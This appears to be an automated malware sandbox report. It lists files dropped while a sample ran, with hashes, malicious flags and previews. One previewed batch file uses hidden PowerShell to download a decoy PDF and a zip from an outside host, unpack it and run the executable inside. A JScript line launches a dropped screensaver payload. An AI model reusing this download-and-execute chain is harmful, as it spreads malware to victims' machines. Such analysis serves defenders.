Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2145
Entropy (8bit):	5.069065986706024
Encrypted:	false
SSDEEP:	24:YFuRV3QJGm27XHZ2LSCt7aZna0TNpnayGZmmuBJvbZW4xCZqu20Z+nZO8ZMCCDxN:YIAwmWXZYEtoitbRCwu20wD+JliWxao
MD5:	93D3A9F3D9E8AB98F1A7DECCDC185F36
SHA1:	707B943D37CA56183276904B6B45302D7E533F81
SHA-256:	05143F1379BA635BB915B3280E7DC560D94375E10D30CBB660BCB49E801F2BBE
SHA-512:	6EE47AB1364C01A9C8D238020E0A22999FCB09E62D6CE923002494C8FDC3D54D73A466792FCBDF4745ACEC3DFA1E05E71990DEA7FAA85F2061872D0312813C1A
Malicious:	false
Preview:	{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733820489000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d550de899f04b5f1cb01c3a7438d5d96","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696428962000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"cfa45c7829b86b94abc8cd788add6752","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696428962000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"2dd86d6e5f99203c47dd099f6b5e82b8","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696428955000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"3ef850c86adcfefa30feaf6c5c1404b1","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1696426848000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"955b63af1bb125ce44faeb9a35adb91d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696426848000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg"

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	0.9823233471034213
Encrypted:	false
SSDEEP:	24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpWW4zJwtNBwtNbRZ6bRZ4nWF:TVl2GL7ms6ggOVpWhzutYtp6P4u
MD5:	8C359665AECF2913CDE2DA1B1B35ADD4
SHA1:	6F9D63528F2EA1EFF70350D9A4CB5FA406894F44
SHA-256:	F1311DF8495B8890808E1246B6AFAE673D93B7D7039613E3CD1DCEB29908C97F
SHA-512:	E6159CCFB6D375DCDC5328C462F0A4313F0FC9123C76D344947C031C2AD8005CC7BBE7BE529547F954F57E56ABC24ED5264E0F5B75A1D85534B2832494D17245
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.3362817077791398
Encrypted:	false
SSDEEP:	24:7+tAvAD1RZKHs/Ds/SpWWPzJwtNBwtNbRZ6bRZWf1RZK6qLBx/XYKQvGJF7ursp:7MAvGgOVpW6zutYtp6PMDqll2GL7msp
MD5:	C8AD8E47BAC42BDDCB02B934BFFB7A9F
SHA1:	35B78716F24BD925F54402EAF151DF457E687F7C
SHA-256:	5A0BD7FCD9B4E88223A72F51BA5EA8085DEF5469367FA4016A515AF3D7EAC7E8
SHA-512:	939C3C8B69CEA0FC5919F0E538EE5F717DCD344B8414E674736F74E0326ED658B3110C91DCE1714BA122AEB22BE69C5EE271F6346673CD10A1F76B688108C7A1
Malicious:	false
Preview:	.... .c.....za........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEghGhat2y9PjPtmktwtvFfzCzkMYyu:6a6TZ44ADEhGst2qPbtsFCoMK
MD5:	1416728AD240E8EF45A6335B9E86B970
SHA1:	2106623DC3784256D2A76034C22711017957CB8F
SHA-256:	F7FB8F477BA57C3361B20260CDD6B7AEA1184F0F8C6C838644D4EB2A61286714
SHA-512:	C3D020AB281BD63401743C796F97E82D968E769EB32808CEC4767567B96099497938DE3ED4576508B6272A928F940EF1335B5CC06C8CB70F88E2B67C147B17F8
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.748849361024628
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5mJKEufLOksaYuWGplZo5uWAX+aJp6/h4Ex:RiJBJHonwWDaJ0/hJkDjEYRswWGrywW9
MD5:	409DEE564E219A2828FDA463ABE7438C
SHA1:	ECBE27FD50B7A55F7F7721F1211B52680088128A
SHA-256:	6B32B3DC0593D2EE0CFF14EEAA4F92C694412F913A4E3EC5BF3739888DF45A62
SHA-512:	733EBA80AC6139857450631972EB22FA56C6238243CE5F725435EC0809279595AB5734944FA9291CECB7E807184581D9724260679FDC60CE26E21CD41CBAA60C
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\DanielPulse.scr\" \"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\R\"")

C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: FwR7as4xUq.exe, Detection: malicious, Browse Filename: InsertSr.exe, Detection: malicious, Browse Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: eddzD2MA12.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CloudSynergy Solutions\R

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	data
Category:	dropped
Size (bytes):	257339
Entropy (8bit):	7.999363363076799
Encrypted:	true
SSDEEP:	6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
MD5:	606D3FBBD2B3F54B73E2B049EBC1CB66
SHA1:	E3D039B3F84158DBC882D62614AEC3A66766509F
SHA-256:	4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
SHA-512:	35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
Malicious:	false
Preview:	>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.\|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V.......U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W....u...a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-\|Cdg.L.........J.8{\| ..5...-.h....!.... f.W..p.^....&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\c2[1].bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	461
Entropy (8bit):	5.063477857663401
Encrypted:	false
SSDEEP:	12:wmMDys81kkGr5ZDRN3is81kkGVX5OQ981kvYX53RP:wmMDXRrLRtHRxUkvYX53RP
MD5:	FB49C7A1DD4185A21E27F13BD77DF648
SHA1:	1D18E9ADF579FDF62F819C700E09BBB6863016C3
SHA-256:	D45D2BD7AC43796F2087198349FE8817F6AAF48484A4B356BD61A76A9631B740
SHA-512:	73174D0AF92471FA0C65C16ECD9369AEB07CC15477B1B41B66EB6A4B52F1B76490D43639E8CDE8137FCE8794867E6AF074CCC6D0819100D0A4726C1995F0BC8A
Malicious:	true
Preview:	@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/f.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %temp%\f.pdf"..cd %temp%..start f.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url% -OutFile %temp%\msword.zip"..powershell -WindowStyle Hidden -Command "Expand-Archive -Path %temp%\msword.zip -DestinationPath %temp%\msword -Force"..cd %temp%\msword..start msword.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21979
Entropy (8bit):	5.049158677118914
Encrypted:	false
SSDEEP:	384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
MD5:	E85ADBB7806D6C2B446681F25E86C54E
SHA1:	7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
SHA-256:	1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
SHA-512:	D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
Malicious:	false
Preview:	PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: FwR7as4xUq.exe, Detection: malicious, Browse Filename: InsertSr.exe, Detection: malicious, Browse Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: eddzD2MA12.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\220239\F

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	257339
Entropy (8bit):	7.999363363076799
Encrypted:	true
SSDEEP:	6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
MD5:	606D3FBBD2B3F54B73E2B049EBC1CB66
SHA1:	E3D039B3F84158DBC882D62614AEC3A66766509F
SHA-256:	4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
SHA-512:	35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
Malicious:	false
Preview:	>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.\|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V.......U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W....u...a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-\|Cdg.L.........J.8{\| ..5...-.h....!.... f.W..p.^....&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Local\Temp\Automatic

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	89403
Entropy (8bit):	7.99813128639969
Encrypted:	true
SSDEEP:	1536:WvzNmlhJS1NqPa2dvcaUjV1a8lW12m0tJURtrJFubAca7D87sxHf:Wv8iNCDcS8kQsz2bAcaE7sxHf
MD5:	3FF8403A4564EE7F0732F6A1ECEB194C
SHA1:	C9EFFAC660CDD5B789928EB9C1AFF4A79F2EAED6
SHA-256:	7EADEF0349D3391EAAA4931B910A12239F118AF38FFEBF5C54C68BDC5CEAAA3E
SHA-512:	8859C01D4CC10D0F09FD86F56B30E38073C973397775741BCEEC26F3F12423E22BA3B765C234D42A5DF705021AFA8DE2EF50E90F9E01931060A94ECEE1CEE698
Malicious:	false
Preview:	..o...>........0%........]Z7EK.K(.I....Y...(..cJ.ls....r. .eD...G.A.K.t.......b.H.,\|..1.\|k..T.-.-..{uF....[h....e...OA+....8:.{.H....y.....a.T...A%m..z..]2.l....j./..=.b....x..FT..h1})...s.....G..e...h....o.GQk..].6..k:...H...H...q...Y.+^.#....&JG{x7Lz....o...8O..j.G/.Z4..2q=..9.0.Y3.6B@.]^.>.F.@1..v..GK.R..8-(.0(z..`B...aO....6E....1.po.B.-&.h.:.:....L..!N..=.1....n.i...~..17<........r.`.W.Q..A.=.?....Q^....A.!...h.._......Jw.......EhGR0..Ki:U.4...".....o..l.VoZ.....Rv.lz...... .(..2v.t..q.B..!g.S..._....x.~,o.8..@M.........C.q.oY...V...R.........S..4..r4...g.u.vy[.js....5[l6p.....F.^..Au.....N..my.)y.......]._....22.V\|..N..i.......=.%<.Z..D.Q.u..d.[wdz^7.}.{....n,.......j........_i..oXl...#...J!...\..c..Q..p.=.PN.\|.Y...1..<...g.e.......0..3..u..tP=8....bA...w...@].$...'?......*....V.J.ko..f"...o..[]F...V..$..6......A=..t.v.W.........zub..d.y>X9/.<0.........Oi.u..Y.S.W..L2...$.A.}....x....2../F....R.1.:7"\\|GU.v.'.;.

C:\Users\user\AppData\Local\Temp\Fires

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.99803755231603
Encrypted:	true
SSDEEP:	1536:4HUCJTibUP87NmFlHoTTX91f9FjcCKxMxdcAwPPLDAdd+DgEbGOHNN+d6n3hlcFD:SWbv8F94f1Fjc6x4Tmd+DeOtN+dURlav
MD5:	DC54D0D4B55783075A2501B87D0C8D31
SHA1:	FEF29A787871C091260C34301D451BE56601CF53
SHA-256:	EFEC3D913AAF25D26D8EC4652340E132A0739B319DB62B12D2332461A2544777
SHA-512:	EABDCFE474DB5B0EA0CC5AE6D3E0CA11B2D785F2C47E1716983E7196CBDE306B69111123C602C40CCABF72481694D7C32E8FE61AE2C38581D04F768A869839CE
Malicious:	false
Preview:	.ke..)....-}f..-...._.....5..'......&.4X...I../...<.....l..4@B..."..J.).FJ.v:^....%.././....+.9..5}....\l.jS..3...ev.B...%...S.S...cG.=j.I).i..\...... .2.q<..v+..N.B.^.%.r.k..4...7....pB..G.B7.Y.................-t.e.(.Q...C5....j.h}.n.....Z..........zE.~..I.t....XY...b..P\|......\..3..hc].......)..k.....[_.J.g&\..3..a..h....w...h...J...e.n.sg,.j..r...N..K{..._1..by..2]j.Z.cb.D....D.b...9.t..D.M.2-...%.L~$6..aZ.Z.h't..\|....i.Z...&..(...Z.....f...P..f.?.[......D....l.......v\|..e...,......?...+.jvG..)...Z.Trx...H.{.......v..f.0.Mc..e'k.....1..@..k.Jvj..H..v.U'J@..U.].Z..P>Pp..<.+.X8B.R.....,%.y..k..._(.HG..\|..%.CaI......P.....nN..&F.hH...+....\|P.h..)$"Em.(-./..+.....!.........BI$'.........x....b...o.b.v......._.....#.j.."[. ..b..h......j..MH.".a^.q...fF.HB.w..)D.......Ms:.a...h.....QL.~3..v8....[..C.....GA..jo...,..Z..m....Z`.W2.<..N....L..w.e.uoV9..d..E..C.d8...C...?....e....M9P.x2.Gt.yv.6..e.~.?@j....L^A*Z....L.Y..C..e....0...]@....qZ".

C:\Users\user\AppData\Local\Temp\MSI63f0c.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5097251598291805
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Er6gmXH:Qw946cPbiOxDlbYnuRKR4H
MD5:	0A952D43D97CC50010901F1552B64DC9
SHA1:	09B1E05745E2212367BCC02A1629BBEB14C461D3
SHA-256:	C54F5D6537EDC79BFE7E39923DE77266A37404F9CA02333514B4B9693B98E944
SHA-512:	B4AC3842533299007FD71A68D323AAB9E94DA1E9A9D16D07A11953744F68FCA4ECE82758B84C760928CEAD4D7C97BFD5D21FDBF1D54847102168F3F1EF05B681
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.0./.1.2./.2.0.2.4. . .0.3.:.4.8.:.1.2. .=.=.=.....

C:\Users\user\AppData\Local\Temp\Missouri

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	885684
Entropy (8bit):	6.621979600120346
Encrypted:	false
SSDEEP:	12288:UV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:uxz1JMyyzlohMf1tN70aw8501
MD5:	B52BB2B76BB34CE2AD510641DB438931
SHA1:	316D724878B112E97A432EC85D10A993BF073274
SHA-256:	0AE073B61844F6F34FA87101DC67487FE4256547A5633D8362BBE659B3CBBFED
SHA-512:	06A3DF9F4910E6C45A074368F3182A37CFC1DE91C749FDBF9C874FB23A555EDB1425534B62E63B23823744A7DF89A677A0455C08563B10F5F74F155014865702
Malicious:	false
